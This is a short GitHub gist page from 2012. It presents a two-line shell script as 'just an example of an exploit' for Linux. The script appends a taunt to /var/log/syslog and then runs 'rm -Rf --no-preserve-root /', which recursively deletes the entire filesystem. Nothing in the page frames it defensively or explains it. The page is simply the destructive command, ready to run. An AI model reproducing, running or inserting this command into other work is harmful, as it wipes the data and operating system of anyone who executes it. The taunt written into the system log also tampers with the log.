Skip to content

Instantly share code, notes, and snippets.

@jrgifford
Created April 10, 2012 20:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jrgifford/2354358 to your computer and use it in GitHub Desktop.
Save jrgifford/2354358 to your computer and use it in GitHub Desktop.
Do note that this is just an example of an exploit that could be used on a Linux system.
#!/bin/sh
echo "SUCKAH" >> /var/log/syslog
/bin/rm -Rf --no-preserve-root /
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment